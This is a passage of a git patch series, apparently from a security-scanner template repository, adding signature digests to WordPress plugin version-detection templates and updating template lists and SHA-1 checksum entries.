'(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a32a676c22f77dffd916baae0a6ffa8dd5aed2ef342971a32f1bbdf92ec7ed1402205d4371307a1b07bb9eb4bca37ee93dccc6e23e3458305dd2d8d83f048b2a647a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..1c448241fd 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206e5dce5ef886264b580ca7bd59873d6df723d8bf0e78169eacbc2b8911dd347d02205c03c2025ff6671371f9a3a42d3612cc8397e27e749c44b9a7c052800002fb38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..b74289a1d8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210097bd73cf6bf242e2e7a0d874bc181caa1522e014d4e996d6edbed54200b7b59c02202b18b48a8b598caa9e91831f2118f24644622b2775246678d4e42c63a15f97cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..402b3144d7 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b72b57e8cfcfd856626bc2b82cf3819699ac09a9336443ebb60049b16359d4d402210091fddcef8ecbfca20e4da7990775579bf80e92f781f5ff36956411da4d6063f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..37e9021542 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205a36b79490a0952be5a36f3b4af5f6f18e3c067e1af437b9191e35842243c80d0221009e807d8d39b16922a4d0177ef5b8c4996b2a3af1967712abad823c2fa3035455:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..50c44fa11d 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206a71e6549526a5bdb50e56f1b813333ea178d733ee1c2c1654011665e3d0f98e02204485db03ece9e2ad77033c8b6e0803ff2afd6aca5d0d8003e10d37c63b0b9077:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..5cc3ad8bc0 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220197e2e656c811f5ae042a18c3f39bf05caf061a68dbc3341e54a2ebde6c3bf84022100cd190e89abb97787c8f79e0f009fa85b22f435b9ee6e575e9277f3406fd8b727:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..0f1c0f5fba 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200b5b29d251ec4477c850a45bd6ec8be81d2ca46434c2b0f7703d0b8e95e06be402202b2ce4c9a42b2654f5a81aef8cb18be32380c07f4ea6c822cee4d9e5d1501c96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..a3efd152dc 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022000ce519b162235c0f2ca825ef0c2cf2172ce8645fd54d9810979028004090374022012621c4f5af19e263feccc8017523dff469b16842b10992d5a64e6ea33cb906c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c2bd86edfe7cc5eb23e71b404cc7cf7c06bb313d Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 29 Jul 2024 03:27:03 +0000 Subject: [PATCH 1702/1841] Auto Generated New Template Addition List [Mon Jul 29 03:27:03 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4db45e34ba..7a6071b44a 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ http/cves/2023/CVE-2023-44393.yaml +http/cves/2024/CVE-2024-6205.yaml http/osint/user-enumeration/substack.yaml From f638bbe5e9a39ca6a56e132b6b566e5194170b3c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 29 Jul 2024 03:27:10 +0000 Subject: [PATCH 1703/1841] Auto Generated Templates Checksum [Mon Jul 29 03:27:10 UTC 2024] :robot: --- templates-checksum.txt | 405 +++++++++++++++++++++-------------------- 1 file changed, 203 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 895b77f51d..727606a9c7 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3301,7 +3301,7 @@ http/cves/2023/CVE-2023-44012.yaml:bbecae0c3583a4572602e3fc0c8619bafeb77bad http/cves/2023/CVE-2023-4415.yaml:17cc5b909d851380cf62dcece5db812a7e1ea68a http/cves/2023/CVE-2023-44352.yaml:aab520d12d287288efc9c45a67a0e196a444ff93 http/cves/2023/CVE-2023-44353.yaml:147dd7796888db15383a9db3b463b1c564bde8cf -http/cves/2023/CVE-2023-44393.yaml:ccfbbd5fa51425d34e26d7623c3fd84f17ae5f03 +http/cves/2023/CVE-2023-44393.yaml:d434c1a0c59df4a9e7a71eae94db99acf50b648c http/cves/2023/CVE-2023-4450.yaml:c0f6a278a989a4e11d99a1543fad5c999232eec8 http/cves/2023/CVE-2023-4451.yaml:d5e665511b95b75eea8988c75f5427b4616e80c9 http/cves/2023/CVE-2023-44812.yaml:11e5628cb888352e0dcd50839df33dc85fb2b58c @@ -3526,6 +3526,7 @@ http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991 http/cves/2024/CVE-2024-6188.yaml:dc4f78116668d20ee580f223cdf67a19cd0c6f26 +http/cves/2024/CVE-2024-6205.yaml:abe35cde7f1ae4324cd919d2c38fced34f8e3054 http/cves/2024/CVE-2024-6289.yaml:83d044a4385a60a024a6dee9f02644f4db94a4b7 http/cves/2024/CVE-2024-6587.yaml:3b9b74b62b5fee24b9ae9e2138affc55ffabe1d3 http/cves/2024/CVE-2024-6646.yaml:2e73ea26a9329272c114fbee69cc648183fda206 @@ -7329,230 +7330,230 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:5fbb3b0f23501107c5a28c2c1f5e01f176ab5541 +http/technologies/wordpress/plugins/add-to-any.yaml:6dee4b80182d0c53e02bba619981dd38952d78dd +http/technologies/wordpress/plugins/admin-menu-editor.yaml:6e20c24b766046959045fb5aba1e66680a20e02c http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:a826be38b4e6cdfc941322092e45d81ded75c4eb +http/technologies/wordpress/plugins/akismet.yaml:14c71fbf07f718230de79ee756387c1479645853 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c986fde0283ceae76ab74876612418330de23167 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:28d92430b2a848b0e3d13dbf392fe2a98b235ede +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:2662f5264d26239606924e6738eb1966850749b3 +http/technologies/wordpress/plugins/amp.yaml:9d65fdba95d92af8bb08bf22cf5010de6732f67d +http/technologies/wordpress/plugins/antispam-bee.yaml:4af4a611b9b0fbf4a2e34773f9168ab01a11df53 +http/technologies/wordpress/plugins/astra-sites.yaml:09b896f2ff367b870d4f4b448496a69fcdcdf8cd http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:ff962bafe73877f19d5c6e2f3e91357602a94074 +http/technologies/wordpress/plugins/backwpup.yaml:d0a9a3683b0f23303272dcc6e95464b64a7c1a86 +http/technologies/wordpress/plugins/better-search-replace.yaml:3d6b718627ac567e05cff994820befd26a3f7453 +http/technologies/wordpress/plugins/better-wp-security.yaml:1fbbba935ab69e6e3cba8d29c2bb225e75bf4aec +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:42d86e0f42099409482f80381d9a3bd585317840 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:b3e6418999ae3c08437424377c7fc07066ce0267 +http/technologies/wordpress/plugins/breeze.yaml:d588e64d9d5a22ca7c79486e456a95e28494706d +http/technologies/wordpress/plugins/broken-link-checker.yaml:5a9715ac85d9aef8f1ea5181f689d00a6d8006ae +http/technologies/wordpress/plugins/chaty.yaml:28b205c7ce880802dd3e3b051250a83cd2ad63ec +http/technologies/wordpress/plugins/child-theme-configurator.yaml:512d32b9e4baeed953c87cdd6e28eb32df877c6d +http/technologies/wordpress/plugins/classic-editor.yaml:3c866b1191c25313e50a5e0f11bad80592083a1d +http/technologies/wordpress/plugins/classic-widgets.yaml:95bd930426e49eaf692aef04b3370125dfc40cdb +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:400689b32f39c2a39ba94fc1436c8a417b113862 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:e2a811d1e49e2e812eabcc744e27d0e5ed86f88b +http/technologies/wordpress/plugins/coblocks.yaml:4b15c2360e6ecdc84df1019b1a21375e02d150f6 +http/technologies/wordpress/plugins/code-snippets.yaml:84de073bf5b09fd6c5080450893f5fbfa320d91c +http/technologies/wordpress/plugins/coming-soon.yaml:d14156a8e7ab885f94703d3ea738a72555a48703 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:277b5a987c4a8ebf1cb0a674e0fc8691135b62cf +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:e9478c74bc7020b77e2114cd9c1256a4aaeb4ad2 +http/technologies/wordpress/plugins/contact-form-7.yaml:ffaa23d9689b5277ecaa10155e50b0484b4accb5 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ea49d2c052f4cf1cedd396850348fcf7f481ce36 +http/technologies/wordpress/plugins/cookie-law-info.yaml:956cc2f1a3bf6491efbb8827d81528ecf8d55601 +http/technologies/wordpress/plugins/cookie-notice.yaml:656150bad76c422818177ab6f86fccf2f56c9792 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:cd5c221a503a693e43db4ce3b7b96b4f1703108a +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:1d6ec36c1242c2353a5c8b6ef1ee5121ca5ac8bd +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:c027986cb86b6b12ddcb5ababbb47d987f272dd4 +http/technologies/wordpress/plugins/custom-css-js.yaml:82ad4053cdbba27511d542e085cdf88cfb64bb72 +http/technologies/wordpress/plugins/custom-fonts.yaml:38f79f96362284fd7945ea0ae18e540643d5850d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:f41835593a0002b189494f6becf98f4021ff8e5f +http/technologies/wordpress/plugins/disable-comments.yaml:050df11e2b9a67bf3778427dc70f1d8c76f109e2 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:9bab6656e9a8a9bc8258d7c439c3bc72421ae904 +http/technologies/wordpress/plugins/duplicate-page.yaml:95643352e549ec66f9b96cd1988c35672958883e +http/technologies/wordpress/plugins/duplicate-post.yaml:2ef20a88e0946a017b4c268a88229e43358c7042 +http/technologies/wordpress/plugins/duplicator.yaml:0ba9d6b3cc19bf902eaed15c794a57501d6a8f97 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:bab2eb71c421641a6256794b50be7a43a0a5948d http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:9c24dc8d6ea56a7a031323b628b82b90bd686d7a +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:760374efb950b47180d6cc5983c3d24da0ee8698 +http/technologies/wordpress/plugins/elementor.yaml:924a46248dca9f7c46511efac1aab6b4c65b786c +http/technologies/wordpress/plugins/elementskit-lite.yaml:4ebf35980294a78bf2eae7039ef28c3170df495f +http/technologies/wordpress/plugins/enable-media-replace.yaml:07eee6cc56f13b92206532b27c3de23cd09173aa +http/technologies/wordpress/plugins/envato-elements.yaml:7892f28212acc18b25207399fd049258b0e2329c +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:d3cf8ca31f766815093d14056df2da6ce0d6987f +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:a45975f9b1e5f33489f8293d5254b1bb392c5b53 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:6ec2f36723bcee773bae8ae0a00daeb9c4155246 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:8e1b3c0c56c54bc650d1131ec52e7531dcec501b +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:228354700f51d17f8dbc30ee42c060169337bb09 +http/technologies/wordpress/plugins/flamingo.yaml:887f322a390ca62f3ee527e998a377a8318bcf06 +http/technologies/wordpress/plugins/fluent-smtp.yaml:13fb0aa62d97d23a47038e2522406a3311fb07aa +http/technologies/wordpress/plugins/fluentform.yaml:75405bc8e73bc6ac7df3fc8d51e7974555a07480 +http/technologies/wordpress/plugins/font-awesome.yaml:5d156344a2afa662c8874ef2c094f53a37597330 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:b6e943cca55a519f081655f2fb5732ba69b6f3de +http/technologies/wordpress/plugins/formidable.yaml:34d8510ad078f263ac361f876f07170d53262402 +http/technologies/wordpress/plugins/forminator.yaml:eda85906fa592170c79358bf2b7977ebd9c16361 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:8028eb9912cf795ef39de6ac09deb006680734d6 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:cc1c3a57f54c1bc1960293a4f776ef811e3b12d6 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:25389e6ba20282bd7eb603e1f6e25f87c5808483 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:4a900d76f3142fb20b490a1be85fd502936fece3 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:2590ae4a68826ba9d8c6a58803a1291e24caa515 +http/technologies/wordpress/plugins/google-site-kit.yaml:a0ef5b4c17270f45bd6895e57f5f6588cf595694 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:064cd496db955926b6c6bb22ba47415060c58a36 +http/technologies/wordpress/plugins/gtranslate.yaml:7e0425ed43ad8e7589bca94c96c165930d88fd6b +http/technologies/wordpress/plugins/gutenberg.yaml:947002a073e70aec9f3b0917620cd69aa2b0b7d9 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:62747a50825012efc9ccc03156ee5887120472b5 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d -http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf -http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 -http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 -http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 -http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 -http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff -http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 -http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:924e1491445165062a875506440d9d6b02cf1416 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:88c5ce53a84244d874fbc5fb4bf554758d58957e +http/technologies/wordpress/plugins/header-footer.yaml:284fec8464e438236691b40464d1054443d462ef +http/technologies/wordpress/plugins/health-check.yaml:332172403a83a394540698e28470c7c6ca56fc5f +http/technologies/wordpress/plugins/hello-dolly.yaml:742b36322231b6074fbf6a86bebb01fdd9a65561 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:411d0ec0f5c6a517608acbc6cfaca8dca784dc4c +http/technologies/wordpress/plugins/hostinger.yaml:2e1abdfb355879c64fc5f5f3e81d6d43428571e3 +http/technologies/wordpress/plugins/image-optimization.yaml:257eadf7770da46b4c00efb1036f91d6a0400897 +http/technologies/wordpress/plugins/imagify.yaml:bbde3ee46eb6835169e17ef49ec0a93f38a74e86 +http/technologies/wordpress/plugins/imsanity.yaml:e45456d8dc9c39e9849082c97157fe54d5e9000a +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:9aaec61e67842011db460a7630cbcc3b7f3e7902 +http/technologies/wordpress/plugins/instagram-feed.yaml:c3fac8d03cb18acd835b150cbc269e86649e1eb4 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:d7bfecb182c3733ad7dfe3c052cf0142fee02fba http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f -http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 -http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a -http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc -http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c -http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 -http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 -http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab +http/technologies/wordpress/plugins/jetpack-boost.yaml:3bb0029a8c3b6ebe0d58a6593860ebd3a2badcec 